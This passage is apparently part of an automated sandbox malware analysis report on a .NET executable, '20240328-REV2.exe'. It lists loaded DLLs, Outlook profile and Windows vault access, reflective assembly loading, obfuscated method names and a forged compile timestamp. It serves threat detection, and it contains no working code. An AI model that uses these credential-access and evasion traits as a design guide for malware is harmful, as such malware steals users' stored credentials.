                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: mscoree.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: kernel.appcore.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: version.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: uxtheme.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: windows.storage.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: wldp.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: profapi.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: cryptsp.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: rsaenh.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: cryptbase.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: wbemcomn.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: amsi.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: userenv.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: sspicli.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: vaultcli.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: wintypes.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: iphlpapi.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: dnsapi.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: dhcpcsvc6.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: dhcpcsvc.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: winnsi.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: mswsock.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: rasadhlp.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Section loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                        Source: Window Recorder Window detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\20240328-REV2.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                        Source: 20240328-REV2.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: 20240328-REV2.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: 20240328-REV2.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: System.Data.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Xml.ni.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: Accessibility.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.ni.pdbRSDS source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Drawing.pdb\ source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: Microsoft.VisualBasic.pdbSystem.Data.ni.dll< source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: XZW.pdb source: 20240328-REV2.exe, WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: mscorlib.pdbx source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.pdbSystem.Data.dll4 source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: XZW.pdbSHA256o source: 20240328-REV2.exe
                        Source: Binary string: System.Configuration.ni.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: mscorlib.ni.pdbRSDS source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Data.ni.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Configuration.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Xml.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Xml.ni.pdbRSDS# source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Core.ni.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: Microsoft.VisualBasic.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Windows.Forms.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: mscorlib.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Drawing.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: mscorlib.ni.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Data.ni.pdbRSDS source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Core.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.ni.pdb source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Data.pdb, source: WER5DE2.tmp.dmp.8.dr
                        Source: Binary string: System.Core.ni.pdbRSDS source: WER5DE2.tmp.dmp.8.dr

                        Data Obfuscation

                        Source: 1.2.20240328-REV2.exe.3799970.8.raw.unpack, V4uC3Iifq56IKQcfry.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                        Source: 1.2.20240328-REV2.exe.6d50000.10.raw.unpack, V4uC3Iifq56IKQcfry.cs .Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, suKFporoyXFpyYjnCY.cs .Net Code: PRsgCpb7f4 System.Reflection.Assembly.Load(byte[])
                        Source: 20240328-REV2.exe Static PE information: 0x81577B65 [Wed Oct 6 16:08:05 2038 UTC]
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Code function: 1_2_05347E88 pushad ; iretd 1_2_05347E91
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Code function: 1_2_06EA3E3A push ds; ret 1_2_06EA3E3B
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Code function: 1_2_070B7E8A push esp; ret 1_2_070B7E91
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Code function: 1_2_08951CC0 push 00000059h; ret 1_2_08951CF8
                        Source: 20240328-REV2.exe Static PE information: section name: .text entropy: 7.946644747446866
                        Source: 1.2.20240328-REV2.exe.3799970.8.raw.unpack, V4uC3Iifq56IKQcfry.cs High entropy of concatenated method names: 'JcqLcnHE8kRk7VHJhl', 'baAwnpSkPWAs4YMGxr', 'wTgrto4LNQ', 'imnL6GCB6AIFRqkhxN', 'RgtTUJcyZL', 'dHYrbjNADO', 'xiCr8b7Qs6', 'PT2rZj37UR', 'P1WruDgOtu', 'd71eKLY6YVFQv'
                        Source: 1.2.20240328-REV2.exe.3799970.8.raw.unpack, vpednoN8EZgsJ4TDwx.cs High entropy of concatenated method names: 'SvRTLtpnA', 'uJwWpedno', 'REZpgsJ4T', 'uwxys3A5Q', 'Tl3iTkB7U', 'EqRFtDP16', 'TW5lfqidm', 'wSKAUGlNW', 'LkrevaXpK', 'cwu0Op5AT'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, MM0nqSL2pcP1fo9nGr.cs High entropy of concatenated method names: 'BRqq8Nr7FX', 'M44qo7oWQY', 'y5ldT8nfBy', 'DvMdSxQh4k', 'OLCqfLuBSA', 'cmhq16tpVP', 'SCZqkDDN1X', 'zPWq2w2ZYe', 'SQSqaFD0qB', 'K0YqKpsekJ'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, sCWHAZsS0UutPc9r2g.cs High entropy of concatenated method names: 'etTqDWEbej', 'aVTq9ZmSyZ', 'ToString', 'ygUqIqK4Vy', 'F03qW68PfY', 'NZXqpU96Xm', 'OmOqAbtClF', 'DoCqOi3l8d', 'i32qeSWy7n', 'C5PqVtpR8w'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, c3RrIbi4S2dSDSPr32.cs High entropy of concatenated method names: 'MIaALo02Ps', 'XPQAuvKU1o', 'BdKpZnNe28', 'oZdpH33057', 'KcZpEo1nSs', 'GnHp3lMg8f', 'H5UpJBQsaA', 'iHZpMK7nrt', 'CfkpjF5Pvw', 'f9xptrqGQx'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, RnjcWbdlYQfuZx2SOm.cs High entropy of concatenated method names: 'NV3ONU9Il7', 'qryOmBsdxi', 'Gy9OC70crg', 'iM7OQBdRMC', 'dG9O6bNAK1', 'IAxOuoEXjH', 'gsPOYi4RYW', 'XMqOnsSXcx', 'riLhLPhLs0YYPUZxElo', 'mpS2gHhw8sDS95jecb8'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, CbbCU2jcbmE3ilttJVQ.cs High entropy of concatenated method names: 'XPCUmg7GMl', 'gLyUyyMIFB', 'kcJUCGjdYv', 'o45UQkBb31', 'PnFULR3T06', 'beRU63YCPm', 'L6sUuOUohj', 'YAVUssRSgx', 'NCPUYTpfA0', 'Xb3Unj10U5'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, YCfeJ21MxuvufFcUrh.cs High entropy of concatenated method names: 'HOWUSlVCuQ', 'GjmUbCZasf', 'QHcUg24F00', 'KBVUIY5jxf', 'CVwUWnQXjr', 'J1YUANPXeh', 'nDWUOLNUVd', 'OHvdFFywmg', 'cDdd8I8DRv', 'ivUdiHpvQN'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, qhMJ8TxmfrQleFASsy.cs High entropy of concatenated method names: 'q0CdvORm10', 'jhhdcIwrtE', 'gjWdZ7GPCu', 'VfadH6X2jF', 'dAHd2VXMFO', 'z0pdErBfv4', 'Next', 'Next', 'Next', 'NextBytes'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, DqO3BeEpxTFOeAX25D.cs High entropy of concatenated method names: 'lEyW2fbXef', 'bRKWaWfYPc', 'RFeWKROrFu', 'kxnWhsPguS', 'Y8mWRZND18', 'BNZW4sMAW4', 'GpIWFmdBSF', 'APnW86wk1l', 'BwJWiMU5tt', 'S5WWoTsWkw'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, iFn0ALuCn6UUl6nxCD.cs High entropy of concatenated method names: 'A3lChOBUq', 'evcQKIesi', 'lPd65EsHy', 'sJ9uBV5BS', 'GDvYs6IuH', 'rK0n98r0O', 'IMqjw9yXAiFrBN8hFp', 'RX9j3aOMNkcrx0ELrg', 'EXLdicfCU', 'vZk01eDu0'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, D0L1d8NNnMWQU8RYtI.cs High entropy of concatenated method names: 'hG2emnaPKs', 'tsbeyrtCq5', 'tN5eCSYfOi', 'VTkeQ3XPQI', 'k2yeLlHI3w', 'bWXe6Bkrqv', 'mVOeuA6pS9', 'gv2esAK9Tf', 'AaDeYEAy2E', 'koVenbvZZu'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, wl90ELqXIUV7JJ3xw4.cs High entropy of concatenated method names: 'Ve2Se8Zu8a', 'B6YSVoaH9X', 'SraSD3yLD1', 'md7S9jIaoy', 'ytVSPBqfWp', 'HB8SBFmXT2', 'XyN6KE66Jr7neSqXtD', 'wvg9D0jKRgulQQD6bd', 'ENMSSTyKMm', 'NNJSbhFl4X'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, ooGS1Jb8LYOjRI2Nyn.cs High entropy of concatenated method names: 'Dispose', 'uXESifRvjL', 'fCZGcJMV0w', 'GrOxxgtYnk', 'cR7SonmTru', 'NpdSz49EfY', 'ProcessDialogKey', 'NxNGT255iU', 'nJ1GSoiYGK', 'KbsGGpI7wN'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, Oss1lVFw9xKlL9Fawd.cs High entropy of concatenated method names: 'dlPdIwagE6', 'iEwdWvK0n8', 'OjhdpVSrVN', 'OoLdAB7lbv', 'adAdOSZmLe', 'gKMdeZCOyp', 'jxJdVOWBto', 'tI8d7YpN2o', 'kIqdDRmfAG', 'xNnd9GJkHG'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, zpbjE8aHbUn0YcN3Lo.cs High entropy of concatenated method names: 'mGxpQuHixV', 'GQLp6b5hBd', 'p0ipsYAL9G', 'OPvpY246VF', 'TyUpPUGMGR', 'ATIpBh0G62', 'f5MpqALqBL', 'Hkbpdu3aHq', 'DJipUWvVR2', 'rC6p0iGycM'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, wYSy8YM5lVQ1qCEVOD.cs High entropy of concatenated method names: 'vsAOwHDiaC', 'TKSOWgGvUO', 'Y39OABLnFl', 'ATZOeV25Uc', 'gGkOVTokAH', 'KgpARjRr47', 'PNcA4PN03g', 'e5KAFI95lA', 'oycA8td9ZL', 'rJZAiwAvxP'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, K5uqj8D3Il5pOp6XVP.cs High entropy of concatenated method names: 'ToString', 'WRhBfx1riw', 'FOoBc1Frlx', 'pe8BZd8hDp', 'XfGBHISJeQ', 'RdrBEibin6', 'YMXB3RW0gx', 'EysBJhUVWa', 'FZsBMO1D20', 'UAmBjHWybS'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, P37vu0CgjevrJVGJRa.cs High entropy of concatenated method names: 'mFDeIh7gTT', 'AAUepvyqja', 'F5FeOXKrOM', 'lhCOocA2pQ', 'cM0OzAh70f', 'ze5eTaKF6D', 'tGheSe1WkE', 'XRPeGDOrvT', 'Auseb0TkKT', 'dvJegCO0c3'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, GxmFgWhgVkoXLP6vb2.cs High entropy of concatenated method names: 'LB7PtER1wW', 'S9dP1xwLNa', 'DlUP2NXFfD', 'Q4IPaU7rkv', 'wkBPc8RjWH', 'QQwPZjw1Jf', 'm5wPH8x7Br', 'f8JPEhdFJY', 'sx9P3ibuoK', 'mYWPJ0yXSX'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, tFEshmjWrsGOPEfxccc.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LYK023aC5B', 'zOd0afH5t5', 's6G0KoeE7y', 'BvS0hiDCX8', 'TEr0Rgn2tM', 'r3U04m6pk7', 'K6C0FIl0H3'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, z27VGsnctYfwDT4cOl.cs High entropy of concatenated method names: 'h7uXsqw47h', 'jZNXY53rol', 'YXFXvan21q', 'iFgXc2aV6j', 'uCoXHKNWVJ', 'OEnXEyeA01', 'RT5XJqC0Qi', 'urJXMX7DbY', 'c6bXtHcnPV', 'EWVXfnxmpo'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, suKFporoyXFpyYjnCY.cs High entropy of concatenated method names: 'kEDbwLlyxu', 'JhWbI2oSAu', 'yjRbWtwXJ1', 'r6NbpKg0xy', 'uR8bACsltZ', 'BesbO8jEpR', 'GPnbeUcUNb', 't6ibV8rkUx', 'Vrgb7jb01H', 'gDNbDMcFed'
                        Source: 1.2.20240328-REV2.exe.b0e0000.12.raw.unpack, rHSVVXzwWXSDqXqYTy.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'FBHUXYQop1', 'bLKUPAZrP1', 'YIxUBRR0rh', 'LmQUq8AUj8', 'xMyUdthDi7', 'rWDUUIrJEV', 'XDXU0PW7i8'
                        Source: 1.2.20240328-REV2.exe.6d50000.10.raw.unpack, V4uC3Iifq56IKQcfry.cs High entropy of concatenated method names: 'JcqLcnHE8kRk7VHJhl', 'baAwnpSkPWAs4YMGxr', 'wTgrto4LNQ', 'imnL6GCB6AIFRqkhxN', 'RgtTUJcyZL', 'dHYrbjNADO', 'xiCr8b7Qs6', 'PT2rZj37UR', 'P1WruDgOtu', 'd71eKLY6YVFQv'
                        Source: 1.2.20240328-REV2.exe.6d50000.10.raw.unpack, vpednoN8EZgsJ4TDwx.cs High entropy of concatenated method names: 'SvRTLtpnA', 'uJwWpedno', 'REZpgsJ4T', 'uwxys3A5Q', 'Tl3iTkB7U', 'EqRFtDP16', 'TW5lfqidm', 'wSKAUGlNW', 'LkrevaXpK', 'cwu0Op5AT'

                        Hooking and other Techniques for Hiding and Protection

                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Users\user\Desktop\20240328-REV2.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
